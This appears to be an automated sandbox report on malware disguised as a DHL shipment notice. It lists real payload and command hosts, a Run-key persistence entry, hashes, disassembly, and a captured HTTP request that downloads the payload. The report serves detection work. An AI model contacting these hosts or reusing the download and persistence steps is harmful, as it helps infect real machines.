      http://178.32.63.50/moss/Host_AKhLBP62.binFieinstal.exe, 00000006.00000002.318237025480.0000000003229000.00000004.00000020.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://178.32.63.50/boss/Host_AKhLBP62.binieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://178.32.63.50/moss/Host_AKhLBP62.binhttp://178.32.63.50/boss/Host_AKhLBP62.binwininet.dllMozilieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      unknown

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      193.104.197.28
      septnet.duckdns.orgunknown
      1299TELIANETTeliaCarrierEUtrue
      178.32.63.50
      unknownFrance
      16276OVHFRtrue

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:1360
      Start date:27.09.2021
      Start time:12:51:29
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 13m 5s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
      Run name:Suspected Instruction Hammering
      Number of analysed new started processes analysed:13
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.rans.troj.evad.winEXE@3/1@1/2
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 84%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .exe
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe
      • TCP Packets have been reduced to 100
      • Excluded IPs from analysis (whitelisted): 20.54.122.82, 20.82.207.122, 209.197.3.8, 20.50.102.62, 93.184.221.240, 40.112.88.60, 67.27.157.126, 67.26.83.254, 67.26.81.254, 8.248.119.254, 67.27.159.126
      • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wdcp.microsoft.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, wd-prod-cp.trafficmanager.net, arc.msn.com, wu.azureedge.net, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      12:54:11AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Halvngen7 C:\Users\user\AppData\Local\Temp\LABERT\Cirkusforestillinger.exe
      12:54:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Halvngen7 C:\Users\user\AppData\Local\Temp\LABERT\Cirkusforestillinger.exe

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      178.32.63.50Booking-Confirmation-1KT277547_ref-5002o2q2XYK-ref_1KT277547_ref-5002o2q2XYK.exeGet hashmaliciousBrowse
      • 178.32.63.50/mt/nansept_YbjxsPwq12.bin
      nSOA_Statement-of-Account_desk-of-account-receivable-june-august-2021-cummulative.exeGet hashmaliciousBrowse
      • 178.32.63.50/ma/Host_wfKdFDKfLU89.bin

      Domains

      No context

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      OVHFRClaim-838392655-09242021.xlsGet hashmaliciousBrowse
      • 51.89.115.111
      2PzMc3x4WP.exeGet hashmaliciousBrowse
      • 87.98.153.120
      e5jVcbuCo5.exeGet hashmaliciousBrowse
      • 176.31.32.199
      i7qUJCnMz0.exeGet hashmaliciousBrowse
      • 176.31.32.199
      zsChlwJrkj.exeGet hashmaliciousBrowse
      • 176.31.32.199
      claim.xlsGet hashmaliciousBrowse
      • 51.89.115.111
      9uHCz7MrjF.exeGet hashmaliciousBrowse
      • 176.31.32.199
      J1IYv644YS.exeGet hashmaliciousBrowse
      • 51.254.69.209
      b3astmode.arm7Get hashmaliciousBrowse
      • 37.187.28.233
      J7SOJRlEly.exeGet hashmaliciousBrowse
      • 51.91.193.179
      SE6Hlp3GfE.exeGet hashmaliciousBrowse
      • 176.31.32.199
      TxIlr8dCCJ.exeGet hashmaliciousBrowse
      • 176.31.32.199
      xZqtlgwoWq.exeGet hashmaliciousBrowse
      • 176.31.32.199
      XwfWWIkABj.exeGet hashmaliciousBrowse
      • 51.254.84.37
      w86r2qGEjf.exeGet hashmaliciousBrowse
      • 176.31.32.199
      xd.arm7Get hashmaliciousBrowse
      • 164.133.71.222
      HYmN4qwdBc.exeGet hashmaliciousBrowse
      • 51.91.236.193
      gXH3oSVmWj.exeGet hashmaliciousBrowse
      • 176.31.32.199
      ylSBV0EjG1.exeGet hashmaliciousBrowse
      • 176.31.32.199
      hfs.exeGet hashmaliciousBrowse
      • 94.23.66.84
      TELIANETTeliaCarrierEU0HXxUcP5S4Get hashmaliciousBrowse
      • 217.212.229.228
      S7wQtTgZBFGet hashmaliciousBrowse
      • 104.123.190.203
      rod3gmxCHKGet hashmaliciousBrowse
      • 178.76.5.162
      i686Get hashmaliciousBrowse
      • 178.76.5.180
      Booking-Confirmation-1KT277547_ref-5002o2q2XYK-ref_1KT277547_ref-5002o2q2XYK.exeGet hashmaliciousBrowse
      • 193.104.197.30
      1JFod4taFmGet hashmaliciousBrowse
      • 193.45.0.22
      ofgE8wetW4Get hashmaliciousBrowse
      • 213.155.150.24
      jew.x86Get hashmaliciousBrowse
      • 80.239.196.190
      vigmCKdmz9Get hashmaliciousBrowse
      • 178.78.11.99
      tohlIdtsnNGet hashmaliciousBrowse
      • 62.115.122.3
      YQqx8LTbmFGet hashmaliciousBrowse
      • 62.115.122.8
      DbGr5tUs3NGet hashmaliciousBrowse
      • 193.45.0.10
      sora.x86Get hashmaliciousBrowse
      • 80.239.148.228
      HsQg5UkrWYGet hashmaliciousBrowse
      • 209.170.88.177
      HtxD2FSo8oGet hashmaliciousBrowse
      • 178.76.30.223
      JMn71TLrESGet hashmaliciousBrowse
      • 217.212.230.150
      frKG4b8C9cGet hashmaliciousBrowse
      • 62.115.56.113
      NVwuK32YYUGet hashmaliciousBrowse
      • 23.52.153.3
      E8BpDKVKq3Get hashmaliciousBrowse
      • 80.239.196.196
      hVb7idLnyvGet hashmaliciousBrowse
      • 178.76.30.221

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Temp\LABERT\Cirkusforestillinger.exe
      Process:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
      File Type:data
      Category:dropped
      Size (bytes):98305
      Entropy (8bit):5.8045067757228095
      Encrypted:false
      SSDEEP:768:I7nneTCCOKskAtEcDpHR0QWNTsO85zCoLi/0Fqt1fgg9ZPxt/ZbwKbdU5p0y:MnWAT4sO87LFIl3Ph2cy
      MD5:DA500D43204B3E3DFEA43798760ED75D
      SHA1:206EE6A976EC8582810DB1EF8C6ED81599F24355
      SHA-256:7B5C4219B3D03A3F8FF154FBAE97DA72A5E640AE13E7A414B2746804DBF2B8F8
      SHA-512:2AA6347B81287C525262059C1B36CD1892603EC4BEF1A1CB1F112BEB83B67029C0EC4EEC61E22B834B591EF866480384164279FC3BDA8532D5828A040DB6AFB5
      Malicious:false
      Reputation:low
      Preview: .Z......................@...............................................!..L.!This program cannot be run in DOS mode....$........,..SM.SM.SM..Q..RM..o.uM.ek.RM.RichSM.................PE..L.....I.................P...@...............`....@..................................j......................................TM..(...........................................................................0... ....................................text....A.......P.................. ..`.data...\ ...`.......`..............@....rsrc................p..............@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................

      Static File Info

      General

      File type:PE32 executable (GUI) Intel 80386, for MS Windows
      Entropy (8bit):5.804544485598051
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.15%
      • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
      File size:98304
      MD5:8e2b177d2ab29c95f067559a029cf5e8
      SHA1:f347fa229d51836344ab5bf89fa531e19aa5e324
      SHA256:b9fdde7d748e27a130c509a589a2c8b92aad279604d3e4ee7ac28187fc5660be
      SHA512:29493bc83ab2348c5f3f707079e968302e03256acd3801d9c5e47c13a87cb9ec70145208bb25a4127e30cbe2cd7edca1a6cd82a23ca7a5e5a8a0bb0a19e1aa00
      SSDEEP:768:37nneTCCOKskAtEcDpHR0QWNTsO85zCoLi/0Fqt1fgg9ZPxt/ZbwKbdU5p0:TnWAT4sO87LFIl3Ph2c
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,..SM..SM..SM...Q..RM...o..uM..ek..RM..RichSM..................PE..L......I.................P...@...............`....@........

      File Icon

      Icon Hash:20047c7c70f0e004

      Static PE Info

      General

      Entrypoint:0x4012f0
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      DLL Characteristics:
      Time Stamp:0x49E892D2 [Fri Apr 17 14:31:46 2009 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:508f324e8f3f3b33e0170cdca30d1edb

      Entrypoint Preview

      Instruction
      push 00401E1Ch
      call 00007F98A8D959C5h
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      xor byte ptr [eax], al
      add byte ptr [eax], al
      dec eax
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [edi], dh
      fistp word ptr [eax+7B83299Ch]
      dec ebx
      mov ah, 62h
      or bh, ch
      movsd
      xor al, cl
      inc edx
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add dword ptr [eax], eax
      add byte ptr [eax], al
      add byte ptr [eax], al
      add al, 00h
      add byte ptr [eax], al
      inc edx
      jnc 00007F98A8D95A3Eh
      jns 00007F98A8D95A46h
      je 00007F98A8D95A37h
      insb
      jnc 00007F98A8D95A37h
      jnc 00007F98A8D95A41h
      bound ebp, dword ptr [edx+65h]
      imul esi, dword ptr [ebp+72h], 73h
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add bh, bh
      int3
      xor dword ptr [eax], eax
      add eax, CFE82B41h
      inc esi
      inc ebx
      sub byte ptr [ebp-44h], al
      in al, dx
      push ecx
      hlt
      imul ecx, eax, 24h
      cld
      and dh, FFFFFF8Eh
      jmp 00007F98A8D95A36h
      fcmovnb st(0), st(1)
      inc ebx
      mov byte ptr [edx+56BAFCB5h], al
      aam 89h
      cmp cl, byte ptr [edi-53h]
      xor ebx, dword ptr [ecx-48EE309Ah]
      or al, 00h
      stosb
      add byte ptr [eax-2Dh], ah
      xchg eax, ebx
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      inc eax
      add dword ptr [eax], eax
      add byte ptr [eax+eax+00h], dl
      add byte ptr [eax], al
      adc al, 00h
      push ebx
      insb
      popad
      je 00007F98A8D95A38h
      imul esi, dword ptr [esi+67h], 73h
      insd

      Data Directories

      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0x14d540x28.text
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x190000x8e4.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
      IMAGE_DIRECTORY_ENTRY_IAT0x10000x104.text
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

      Sections

      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x10000x141f00x15000False0.50043015253data6.21499607809IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      .data0x160000x205c0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
      .rsrc0x190000x8e40x1000False0.169921875data1.92865182643IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

      Resources

      NameRVASizeTypeLanguageCountry
      RT_ICON0x197b40x130data
      RT_ICON0x194cc0x2e8data
      RT_ICON0x193a40x128GLS_BINARY_LSB_FIRST
      RT_GROUP_ICON0x193740x30data
      RT_VERSION0x191500x224dataChineseTaiwan

      Imports

      DLLImport
      MSVBVM60.DLL_CIcos, _adj_fptan, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaExitProc, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarDup, __vbaStrToAnsi, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

      Version Infos

      DescriptionData
      Translation0x0404 0x04b0
      InternalNameVOLDFRELSERS
      FileVersion1.00
      CompanyNameSeismic
      ProductNameBarkerne8
      ProductVersion1.00
      OriginalFilenameVOLDFRELSERS.exe

      Possible Origin

      Language of compilation systemCountry where language is spokenMap
      ChineseTaiwan

      Network Behavior

      Snort IDS Alerts

      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
      09/27/21-12:54:11.229766TCP2018752ET TROJAN Generic .bin download from Dotted Quad4980680192.168.11.20178.32.63.50
      09/27/21-12:54:15.667402UDP254DNS SPOOF query response with TTL of 1 min. and no authority53541501.1.1.1192.168.11.20

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Sep 27, 2021 12:54:11.211550951 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.229293108 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.229574919 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.229765892 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.300846100 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.300967932 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.301052094 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.301079035 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.301104069 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.301424026 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.318528891 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.318638086 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.318690062 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.318840027 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.318875074 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.318901062 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.318952084 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.319000006 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.319046021 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.319233894 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.336420059 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.336574078 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.336679935 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.336698055 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.336751938 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.336813927 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.336863995 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.336921930 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.336942911 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.336976051 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.337025881 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.337073088 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.337160110 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.337172985 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.337207079 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.337296009 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.337423086 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.354671955 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.354825974 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.354952097 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.354952097 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.355000019 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.355063915 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.355142117 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.355148077 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.355211973 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.355259895 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.355303049 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.355307102 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.355343103 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.355377913 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.355453968 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.355460882 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.355531931 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.355583906 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.355616093 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.355624914 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.355648041 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.355700016 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.355741978 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.355778933 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.355851889 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.355895996 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.355902910 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.355937004 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.355951071 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.355998993 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.356004000 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.356045008 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.356086969 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.356091976 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.356138945 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.356184959 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.356185913 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.356240034 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.356321096 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.356401920 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.373742104 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.373841047 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.374006987 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.374023914 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.374058008 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.374072075 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.374104977 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.374150991 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.374193907 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.374233007 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.374345064 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.374365091 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.374392986 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.374439955 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.374485970 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.374531984 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.374531984 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.374578953 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.374624968 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.374670029 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.374680042 CEST4980680192.168.11.20178.32.63.50
      Sep 27, 2021 12:54:11.374716043 CEST8049806178.32.63.50192.168.11.20
      Sep 27, 2021 12:54:11.374718904 CEST4980680192.168.11.20178.32.63.50

      UDP Packets

      TimestampSource PortDest PortSource IPDest IP
      Sep 27, 2021 12:53:18.719424009 CEST5818553192.168.11.201.1.1.1
      Sep 27, 2021 12:53:18.728887081 CEST53581851.1.1.1192.168.11.20
      Sep 27, 2021 12:53:18.894464016 CEST6228753192.168.11.201.1.1.1
      Sep 27, 2021 12:53:18.903879881 CEST53622871.1.1.1192.168.11.20
      Sep 27, 2021 12:54:07.946261883 CEST6295753192.168.11.201.1.1.1
      Sep 27, 2021 12:54:07.954547882 CEST53629571.1.1.1192.168.11.20
      Sep 27, 2021 12:54:09.241504908 CEST4967653192.168.11.201.1.1.1
      Sep 27, 2021 12:54:09.249978065 CEST53496761.1.1.1192.168.11.20
      Sep 27, 2021 12:54:15.565355062 CEST5415053192.168.11.201.1.1.1
      Sep 27, 2021 12:54:15.667402029 CEST53541501.1.1.1192.168.11.20
      Sep 27, 2021 12:54:19.062755108 CEST6246553192.168.11.201.1.1.1
      Sep 27, 2021 12:54:19.071634054 CEST53624651.1.1.1192.168.11.20
      Sep 27, 2021 12:54:42.318491936 CEST6408653192.168.11.201.1.1.1
      Sep 27, 2021 12:54:42.328056097 CEST53640861.1.1.1192.168.11.20
      Sep 27, 2021 12:54:42.489351034 CEST5904453192.168.11.201.1.1.1
      Sep 27, 2021 12:54:42.498477936 CEST53590441.1.1.1192.168.11.20
      Sep 27, 2021 13:00:19.081100941 CEST6510653192.168.11.201.1.1.1
      Sep 27, 2021 13:00:19.089767933 CEST53651061.1.1.1192.168.11.20

      DNS Queries

      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
      Sep 27, 2021 12:54:15.565355062 CEST192.168.11.201.1.1.10x387dStandard query (0)septnet.duckdns.orgA (IP address)IN (0x0001)

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
      Sep 27, 2021 12:54:15.667402029 CEST1.1.1.1192.168.11.200x387dNo error (0)septnet.duckdns.org193.104.197.28A (IP address)IN (0x0001)

      HTTP Request Dependency Graph

      • 178.32.63.50

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.11.2049806178.32.63.5080C:\Program Files (x86)\Internet Explorer\ieinstal.exe
      TimestampkBytes transferredDirectionData
      Sep 27, 2021 12:54:11.229765892 CEST127OUTGET /moss/Host_AKhLBP62.bin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
      Host: 178.32.63.50
      Cache-Control: no-cache
      Sep 27, 2021 12:54:11.300846100 CEST128INHTTP/1.1 200 OK
      Date: Mon, 27 Sep 2021 10:54:11 GMT
      Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
      Last-Modified: Sun, 26 Sep 2021 18:13:42 GMT
      ETag: "28240-5cce9f0c40c70"
      Accept-Ranges: bytes
      Content-Length: 164416
      Content-Type: application/octet-stream
      Data Raw: 4d 4b d6 90 54 86 89 f0 36 1f 32 7c 2f 5d 6b 2e cb 8b 6b 55 82 7c 3d 3b a7 2e d8 a7 47 4a 66 5d 4f 27 77 ef 07 33 dd 7d 63 4d fb 54 76 98 8e 5d 1a 2d b8 51 91 f7 a8 a0 dd b8 38 01 88 e3 5a 14 c3 12 34 c4 32 f4 fc 10 65 b3 22 bc c7 24 49 65 ab 12 a6 e7 7e 99 9f 75 1d 58 f8 48 77 7a f4 e0 8e a4 ee f6 6b 1d 3f 71 34 2c 09 f4 d2 b3 5a 25 80 52 98 7c ce 1b 6c cd e2 71 17 bb c8 bc b6 e4 8d 25 17 4b 60 93 2a 20 59 fa 80 0b 2b bb 01 81 4a 7c 4f db c1 3a 77 a7 10 f9 c2 35 2f 03 4d dc 7e 5d fe f6 13 04 d7 0a bf e2 31 f0 f8 d4 05 34 0d 10 2d c7 8c b7 ad b7 55 21 c5 4c e7 d1 04 c4 c9 13 8a c5 b0 89 a8 93 29 59 2c a4 1f f7 fe 61 1c 81 bc 35 75 7d 68 55 87 48 c4 5a cd 6e 41 73 6b d6 78 63 27 4d c4 ee 64 83 93 cd b3 6f 41 93 76 5f 8f d9 97 5a 5b da ac 03 92 b0 43 3b 49 d9 2b d1 d9 55 ab b4 3b 54 c9 d3 10 2d 3a 80 9e e2 41 b7 02 14 11 7b 38 bf 3e 64 c4 22 fd d9 c4 8f 79 95 4f 2d 77 1a 88 51 86 89 f8 77 bb b2 55 49 a4 31 a6 58 a5 d9 3c f1 bd 1b 44 a6 6c 29 df 59 c0 6e de 68 f0 eb 86 a1 15 7c 81 70 